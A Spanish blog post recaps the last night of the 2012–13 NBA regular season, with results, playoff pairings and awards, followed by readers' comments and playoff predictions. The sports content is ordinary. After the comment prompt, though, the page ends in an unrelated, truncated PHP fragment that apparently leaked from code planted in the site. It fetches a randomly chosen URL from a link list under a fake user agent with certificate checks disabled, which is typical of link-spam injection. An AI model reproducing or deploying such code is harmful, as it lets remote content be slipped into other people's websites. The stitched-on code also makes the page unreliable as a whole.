La Crónica: Se baja el telón

18 de April de 2013 por Simon

Ahora sí, terminó la temporada regular. Tras 82 partidos llegábamos a esta última jornada con algunas incógnitas y con la posibilidad de que bailaran casi todos los puestos de Play Off en el Oeste, mientras que en el Este estaba casi todo decidido. Las incógnitas que planteaba esta última jornada apenas presentaron sorpresas: los Lakers se meten en Play Off como séptimos y el resto de posiciones no se movieron en ninguna de las dos conferencias. Además, Stephen Curry logró el récord de triples.

La principal duda en la última jornada era quién conseguiría esa última plaza de Play Off que aún bailaba. Finalmente será de Los Angeles que venció tras una prórroga a Houston Rockets. La derrota de Utah unas horas antes a manos de Memphis ya les dejaba clasificados matemáticamente pero con la victoria, los Lakers se hicieron con la séptima plaza del Oeste. El partido fue una auténtica batalla. Ambos equipos, una vez clasificados, buscaban la victoria para evitar a Oklahoma City Thunder. Desde el inicio Houston llevó la batuta del marcador aunque con diferencias escasas. Mediado el tercer cuarto las alarmas sonaron en Lakers pues la diferencia subió por encima de los 10 pero poco a poco los jugadores amarillos lograron limar las diferencias amparados en un dominio del rebote absolutamente brutal, Un Pau Gasol excelso y un Dwight Howard infranqueable en defensa, pararon una y otra vez las acometidas de Houston. En el último segundo y con Lakers 3 arriba, Parsons forzó la prórroga con un espectacular triple. Una vez en la prórroga, el partido siguió el mismo guión,  aunque esta vez Lakers pudo llevarse el gato al agua (99-95). Pau Gasol logró el séptimo triple doble de su carrera, 17 puntos, 20 rebotes y 11 asistencias, Howard acabó con 16 puntos y 18 rebotes, y Blake también cuajó un gran partido anotando 24 puntos y consiguiendo 7 rebotes y otras tantas asistencias. 

Parecía difícil que Utah ganara en casa de Memphis con lo que se jugaban estos, y viendo el partido pareció  todavía  más difícil. Un tercer cuarto paupérrimo les quitó toda opción de victoria y Play Off (70-86). Utah se ahogó en la orilla. Tampoco hubo final feliz para Memphis pues a pesar de la victoria finalmente serán quintos sin ventaja de campo debido a la victoria de los Clippers en Sacramento, en el que puede haber sido el último partido NBA en la ciudad en mucho tiempo. Los de Los Angeles tuvieron que pelear con todo pues Sacramento Kings  y en concreto Demarcus Cousins no pusieron las cosas fáciles a Chris Paul y compañía (112-108). Denver por su parte,  hizo buenos los pronósticos llevándose una victoria cómoda (98-118) ante los Suns que certifica su tercer puesto en la conferencia.

Las posiciones quinta y sexta del Este tampoco presentaron cambios pues Chicago venció con un espectacular Carlos Boozer a la cabeza a unos peleones Washington Wizards (92-95). Atlanta, por su parte, apenas luchó la quinta posición y pareció conformarse con la sexta plaza pues incluso dio descanso a sus titulares, lo mismo que  New York lo que provocó que viviéramos un partido de segundo o tercer nivel que tuvo en el novato Copeland como jugador más destacado (92-98). Por su parte, Miami cerró una magnífica temporada regular con una victoria cómoda, en un partido que curiosamente enfrentaba al mejor y peor equipo de esta temporada regular en la NBA (93-105).

En el resto de partido poca historia que contar. Oklahoma dio descanso a Durant, Westbrook solo disputó 7 minutos  y los Thunder cayeron en casa ante unos Milwaukee Bucks que contó con el rookie John Henson como dinamitador del partido con 28 puntos y 16 rebotes (95-89). San Antonio Spurs cayó también en esta última jornada ante Minnesota. A partir de mitad del tercer cuarto, San Antonio desconectó y eso les llevó directos a la derrota ante unos Wolves que tenían ganas de terminar esta aciaga temporada con una victoria (108-95). Golden State sí terminó la temporada venciendo y además Stephen Curry estableció una nueva marca de triples anotados en una sola temporada. 272 es la nueba cifra a batir.  Buen partido de los Warriors que no dieron ninguna opción a unos buenos Blazers liderados por Aldridge que terminó el partido con 30 puntos y 21 rebotes (99-88). David Lee acaba la temporada con 56 dobles-dobles, el que más ha conseguido este temporada. Dallas finalmente logra terminar la temporada al 50% de balance victorias/derrotas gracias a su victoria en esta última jornada ante New Orleans Hornets.  Dallas mandó en el marcador durante todo el partido sin excesivos problemas y se llevó una victoria que pone fin a una mala temporada de los Mavs, acostumbrados a entrar en Play Off año tras año (87-99).

En el Este, Toronto Raptors se impuso a unos Celtics que apenas lucharon la victoria y que prefirieron dar descanso a los más habituales de cara a Play Off (90-114); Brooklyn venció  en casa a unos flojos Detroit Pistons (99-103); Charlotte venció  a Cleveland (98-105) alargando a 3 su racha de victorias consecutivas que le ha permitido no ser el peor equipo de la liga esta temporada, y Indiana reservó a sus titulares ante Philadelphia y lo pagó  perdiendo (105-95).

Así pues las eliminatorias quedan de la siguiente forma:

OESTE

  • Oklahoma City Thunder – Houston Rockets
  • Los Angeles Clippers – Memphis Grizzlies
  • Denver Nuggets – Golden State Warriors
  • San Antonio Spurs – Los Angeles Lakers
ESTE
  • Miami Heat – Milwaukee Bucks
  • Brooklyn Nets – Chicago Bulls
  • Indiana Pacers – Atlanta Hawks
  • New York Knicks – Boston Celtics

PREMIOS

MVP: Imperial Pau Gasol. El español ha desmotrado desde que volvió de su lesión que es la tabla a la que se han de coger los Lakers si quieren avanzar en los Playoffs. Su partido de ayer (17 puntos, 20 rebotes y 11 asistencias) en un momento de máxima tensión y responsabilidad supone un golpe encima de la mesa ante todos los que le han criticado esta temporada.

Rookie: John Henson se hinchó a jugar y lo aprovechó con 28 puntos y 16 rebotes.

Sorpresa: El último día de regular salen sorpresas de todas partes: Mike Scott, Chris Copeland, Reggie Jackson… Pero nos quedamos con el partidazo de Steve Blake y su 24-7-7.

Decepción: Blake Griffin jugó uno de sus peores partidos del año justo cuando su equipo lo necesitaba. Se quedó en 7 puntos con un 3 de 10 en tiro y además perdió 4 balones.

Esfuerzo en vano: No tenía ganas Demarcus Cousins de plantar una alfombra roja a los Clippers. Sus 36 puntos y 22 rebotes casi le cuestan un disgusto a los de Los Angeles. Lamarcus Aldridge se abonó también al 30-20 pero tampoco se llevó la victoria.

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. Denise dice:
    #1

    Mi apuesta de quienes pasan:
    OKC, Lakers, Clippers, Denver
    Miami, NY, Chicago y Atlanta.

    Palo gordo para Orlando la no presencia de Smart para el Draft. Era su apuesta clara, a partir de ahora, ya no sé si irán a por Burke que es el mejor PG que aparece en los mocks, ó directamente irán por el mejor jugador que crean conveniente independientemente de la posición en la cancha que ocupe.

      Citar

  2. GreenPride dice:
    #2

    Bueno pues se acabo la regular y por fín damos paso a los PO. Empieza lo bueno, el baloncesto de verdad a muerte y las eliminatorias a cara de perro. Y empiezan con un clarísimo favorito al título en los Miami Heat. Todo lo que no sea un repeat por parte de los de Miami creo que habría que nombrarlo de sorpresa a no ser que haya lesiones de por medio. En el Este en principio no tienen rival que se les acerque y sólo unos Knicks con todas las luces encencidas podrían inquietar algo a los Heat aunque yo personalmente no me fío mucho de los Knikcs y quiero ver cómo están de verdad en esa primera ronda contra mis orgullosos verdes de Boston en la que sin duda es la eliminatoria más interesante a priori de primera ronda en el Este.
    Mientras en el Oeste, los Lakers que ya venían jugando mejor este último mes y medio le quitan el 7º puesto a Houston y evitan así a OKC. Una lástima la lesión de Kobe porque con Gasol&Howard a este nivel son rival temible para cualquiera si tuvieran a Bryant. Sin él no les veo ganando más de uno o dos partidos a los Spurs, veremos. Del resto OKC se reencontrará con Harden en una eliminatoria que debería ser clara mientras que los Nuggets tras un temporadón deberían acabar con los Warriors sin demasiados agobios. Y queda la gran eliminatoria de primera ronda. El Clippers-Grizzlies reedición de la eliminatoria del año pasado pero con el factor cancha a favor de los de LA este año. Debe ser una eliminatoria apasionante. Yo personalmente veo un paso por delante a los Clippers porque tienen el tipo de jugadores que deciden en PO como CP3 o Billups pero estoy seguro de que va a ser una eliminatoria muy igualada.
    Llegó el momento del año y a partir del sabado a disfrutar de los 3 meses más apasionantes de basket. Así tirandome a la piscina voy a dejar mis pronósticos para que todos os podáis reir cuando repaséis los resultados de verdad :
    Miami 4-0 Milwaukee
    New York 4 – 3 Boston
    Indiana 4 – 2 Atlanta
    Brooklyn 4 – 3 Chicago
    OKC 4 – 1 Houston
    San Antonio 4 – 2 Lakers
    Denver 4 – 2 Golden State
    Clippers 4 – 3 Memphis
    Para Semis:
    Miami 4 – 1 Brooklyn
    New York 4 – 2 Indiana
    OKC 4 – 2 Clippers
    San Antonio 2 – 4 Denver
    Finales de Conf
    Miami 4 – 2 New York
    OKC 4 -.3 Denver
    Finales
    Miami 4 – 2 OKC
    Ahí queda a ver si acierto algún resultado

      Citar

  3. Denise dice:
    #3

    GreenPride: Todo lo que no sea un repeat por parte de los de Miami creo que habría que nombrarlo de sorpresa a no ser que haya lesiones de por medio.

    +100000

    MIA – MIL 4-0
    NYK- BOS 4-1
    BKN – CHI 3-4
    IND – ATL 2-4

    OKC- HOU 4-2
    SAS – LAL 3-4
    DEN-GSW 4-2
    LAC- MEM 4-2

      Citar

  4. Denise dice:
    #4

    GreenPride: Todo lo que no sea un repeat por parte de los de Miami creo que habría que nombrarlo de sorpresa a no ser que haya lesiones de por medio. En el Este en

    +100000

    MIA – MIL 4-0
    NYK- BOS 4-1
    BKN – CHI 3-4
    IND – ATL 2-4

    OKC- HOU 4-2
    SAS – LAL 3-4
    DEN-GSW 4-2
    LAC- MEM 4-2

      Citar

  5. diestro dice:
    #5

    Yo si fuera los Spurs tendria algo de miedito. LA no tiene ya nada que perder, porque aunque el nivel de exigencia es alto, muchos se veían fuera de playoffs hace no mucho. Tener a un equipo de tanta calidad sin la presión de ser favoritos es algo nuevo en los Angeles, y puede pasar cualquier cosa. Aun así supongo que pasaran los Spurs, pero la ilusión por estos laekers sigue viva.

    Miami 4-0 Milwaukee
    New York 4 – 1 Boston
    Indiana 4 – 2 Atlanta
    Brooklyn 3 – 4 Chicago
    OKC 4 – 0 Houston
    San Antonio 4 – 2 Lakers
    Denver 4 – 2 Golden State
    Clippers 2 – 4 Memphis

      Citar

  6. R1Molano dice:
    #6

    A Aldridge no le dejaron no ser decepción, fue sentado todo el último cuarto con su 30-22 a cuestas. Motivos de tanking

      Citar

  7. Nacho dice:
    #7

    “272 es la nueba cifra a batir.” Igual se hace Bieja, jaja. xD, es la putada de que estén juntas en el teclado, pero hace daño a la vista…
    Voy a intentar verme los PO. Si hay tiempo… He visto poco este año, a sí que… no puedo opinar, he seguido la nba gracias a vosotros.
    Apuesto por Denver como campeones… aún sin Gallinari. Donde tengo que dejar cuartos pa forrarme…?

      Citar

  8. Denise dice:
    #8

    Nacho: Apuesto por Denver como campeones… aún sin Gallinari. Donde tengo que dejar cuartos pa forrarme…?

    Jo, eso si que es una apuesta arriesgada, y ya si pones a Javale McGee como MVP….

    Miami es un equipo completisimo, los veo muy por encima del resto, en una serie a 7 partidos sólo veo a Clippers y Knicks con posibilidades de batirlos.

      Citar

  9. Esteban dice:
    #9

    bien por los lakers clasificando y sin kobe,

    ganaar ayer se les antojaba fundamental, pues frente akl thunder no tenian absolutamente nada que hacer ante la velocidad y piernas jovenes de durant y westbrook, simplemente no pueden correr a su ritmo, ademas de enfrentarse a perkins e ibaka, una dupla hecha desde sus inicios para enfrentar a bynum y gasol, aunque con mas sentido aun si esta howard

    los spurs son harto mejores que los lakers, pero al menos son iguales de viejos, y sin manu y parker al 100%, mejor no les podia salir a los amarillos

    atlanta bancandose las criticas pero haciendo lo debidoi, no por que prefieran a los pacers q a los nets, pues en PO, ambos equiopos tienen un potencial parecido, sino porque evitando el 4to puesto no sse cruzan al heat sino hasta una hipotetica final de conferencia

    el año pasado, les salio asi a los celtics, cuando claramente los pacers eran el segundo mejor equipo de la conferencia

      Citar

  10. Jose Luis dice:
    #10

    Venga va, se podría hacer una entrada para apuestas. Sólo apuestas, ningún comentario más, igual que el que se hace en la porra. Yo lo haría por rondas, para no ir eliminando gente de buenas a primeras. Si queréis hasta yo redacto lo que sería la entrada y el formato de competición, de las 4 “rondas” (cuartos de conferencia, semifinales de conferencia, final de conferencia, finales de la NBA).

      Citar

  11. Ruxixón dice:
    #11

    Me plantee la jornada en plan que si ganaba Utah me veía el partido de Houston vs Lakers…infumable el partido de los mormones.Quitando Hayward el resto sólo metieron algo de tensión en el último cuarto,como si no se jugaran nada,decepcionantes.Así que bien por Lakers que después de pasarlas putas toda la temporada están en PO,sin Kobe pero con un chute anímico importante.Tienen más opciones con San Antonio pero no hay que olvidar que los Spurs van con el motor a ralentí desde hace unas cuantas jornadas y por trayectoria la diferencia en los banquillos es abismal.Aún con el favoritismo de los Spurs la clave es el primer partido,la medida que puedan dar los Lakers en campo ajeno en el momento de la verdad con su racha actual.Si ganan el primero apuesto por ellos.

    Esperando el post de apuestas 😉

    Denise:
    Palo gordo para Orlando la no presencia de Smart para el Draft. Era su apuesta clara, a partir de ahora, ya no sé si irán a por Burke que es el mejor PG que aparece en los mocks, ó directamente irán por el mejor jugador que crean conveniente independientemente de la posición en la cancha que ocupe.

    Para mi gusto la elección de Orlando es Noel.No tenéis prisa la temporada que viene,es más os viene bien para montar un equipazo para la 14/15 entre draft y lo que compreis en FA,así que Noel puede entrar poco a poco encargándose de las tareas defensivas mientras que Vucevic sigue consolidando su juego y desarrollando más su tiro a media distancia.

      Citar

  12. Denise dice:
    #12

    Para mi gusto la elección de Orlando es Noel.No tenéis prisa la temporada que viene,es más os viene bien para montar un equipazo para la 14/15 entre draft y lo que compreis en FA,así que Noel puede entrar poco a poco encargándose de las tareas defensivas mientras que Vucevic sigue consolidando su juego y desarrollando más su tiro a media distancia.

    El problema es el tema de la rodilla, y el nuevo GM de los Magic mira con detalles ese aspecto, de hecho, ya rechazó a Bynum en el trade con Howard, y hace poco declaró que no drafteó a Jared Sullinger por el tema de la espalda. Y quizas Henningan pueda pensar que Noel pueda ser Greg Oden 2.0.
    Yo a día de hoy, pienso que ellos irán o por McLemore ó por Burke.

      Citar

  13. Ruxixón dice:
    #13

    ¿Faried es out for season?

      Citar

  14. Jose Luis dice:
    #14

    Sí, fractura de tobillo por lo que creo. Vaya palo a Denver, otro más… aunque no veo mucha diferencia entre Faried y Anthony Randolph ¡ojito a los Warriors!

      Citar

  15. Jose Luis dice:
    #15

    Bueno, lo he mirado en cbssports.com, y se refieren a “out for season” en plan “regular season”, porque en la actualización del día 15 ponía que podría jugar contra Phoenix (cosa que no hizo). Dice que tiene un esguince:

    Faried could return for playoffs: Nuggets forward Kenneth Faried will miss the final two games of the regular season after an MRI on Monday revealed a sprained ligament in his left ankle, the Denver Post reports. The exam did not reveal any fractures and he could possibly return for the start of the NBA playoffs on Saturday. Faried will be sidelined for Monday’s game at Milwaukee and Wednesday’s contest against Phoenix.
    (Updated 4/15/13)

      Citar

  16. Txusma dice:
    #16

    Jose Luis:
    Venga va, se podría hacer una entrada para apuestas. Sólo apuestas, ningún comentario más, igual que el que se hace en la porra. Yo lo haría por rondas, para no ir eliminando gente de buenas a primeras. Si queréis hasta yo redacto lo que sería la entrada y el formato de competición, de las 4 “rondas” (cuartos de conferencia, semifinales de conferencia, final de conferencia, finales de la NBA).

    Pues venga, ya sabes a que correo enviarlo !

      Citar

  17. Sancho88 dice:
    #17

    Venga, estaría guapísimo, una especie de Nostradamus como en la ACB.com jejeje. Pero sin jugar pasta que me conozco, jejeje

      Citar

  18. Jose Luis dice:
    #18

    Txus tienes un correo, ya me comentas

      Citar

  19. Sempren dice:
    #19

    Denise, ¿por qué apuestas por Atlanta ganando a los Pacers? La verdad es que en algunos resultados no estoy de acuerdo, pero tu apuesta en esa eliminatoria me sorprende.
    Para mí George Hill, Paul George, West (y Hibbert) me parecen un bloque más potente que Horford, Josh Smith… y Teague y Korver.

    Yo apostaría por lo siguiente:

    MIA – MIL 4-0
    NYK- BOS 4-3
    BKN – CHI 3-4
    IND – ATL 4-2

    OKC- HOU 4-1
    SAS – LAL 4-2
    DEN-GSW 4-2
    LAC- MEM 3-4

    Yo creo que va a haber unas cuantas eliminatorias muy disputadas, con grandes equipos. Reconozco que en el Clippers-Grizzlies me dejo llevar por lo que prefiero, pero solo porque va a estar muy igualado.

      Citar

  20. MagicJohnson32 dice:
    #20

    Chavales, el League Pass ofrece una promoción, este fin de semana prueba gratuita. Para los que nunca lo hayan hecho, hay que darse de alta en http://watch.nba.com/nba/subscribe, seleccionar “Prueba gratuita”, rellenar todos los datos, incluyendo los de facturación, y darse de baja antes de la medianoche del día 22 (hora de la costa este). Aseguraos que en el momento de contratarlo os aparece 0€ en el precio.

    Por cierto, para España el LP de los Playoffs sólo cuesta 9€. Claro, bloquean todos los partidos de D+, pues qué menos que hacer descuento.

      Citar

  21. Denise dice:
    #21

    Sempren: Denise, ¿por qué apuestas por Atlanta ganando a los Pacers? La verdad es que en algunos resultados no estoy de acuerdo, pero tu apuesta en esa eliminatoria me sorprende.Para mí George Hill, Paul George, West (y Hibbert) me parecen un bloque más potente que Horford, Josh Smith… y Teague y Korver.

    Para mí es la eliminatoria que mas igualada. Indiana defiende muy bien y en casa son un fortín, pero me decanto porque el juego interior de Hawks lo veo más fisico y contundente que el de Pacers, creo que entre Smith y Horford pueden comerse a la pareja West e Hibbert y decantar la eliminatoria por ese aspecto. Además me ha sorprendido Jeff Teague, ha mejorado mucho y aunque no sea un gran defensor, pienso que puede superar a Hill. Si George no juega en modo MVP, para mi los Hawks tienen mucho ganado.

      Citar

  22. Chipi dice:
    #22

    Pues yo tengo mucho, muchísima confianza en estos Pacers. Los de Indiana ya han demostrado a lo largo de la temporada regular que definenden muy muy bien, sobre todo cuando se encuentran con equipos gallitos. En el horizonte aparecen NY o Boston y Miami. No sería nada raro que se plantasen en la final de conferencia y pusieran en serios aprientos a Lebron &Co. (¿Cuántas veces les han ganado esta temporada? ¿2?

    En el Oeste no lo tengo tanclaro. La única serie que veo clara es la de Ocklahoma y los demás equipos se van a desgastar mucho entre ellos, porque están superigualados. Mi pronóstico:

    MIA – MIL 4-0
    NYK- BOS 4-2
    BKN – CHI 4-2
    IND – ATL 4-3

    OKC- HOU 4-0
    SAS – LAL 3-4
    DEN-GSW 2-4
    LAC- MEM 3-4

    Cualquier parecido con la realidad será mera coincidencia.

      Citar

  23. Jose Luis dice:
    #23

    Guardad vuestros pronósticos para la entrada oficial de la porra 😀

      Citar

  24. MagicJohnson32 dice:
    #24

    Jennings dice que los Bucks ganarán a Miami en 6 partidos. Igual lo queréis tener en cuenta para vuestras predicciones 😀

      Citar

  25. Jose Luis dice:
    #25

    Mmm después de la credibilidad obtenida cuando dijo que quería batir el récord de asistencias del Rookies vs Sphomores del All-Star (17 de Chris Paul) y no dio ni 10 creo… xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>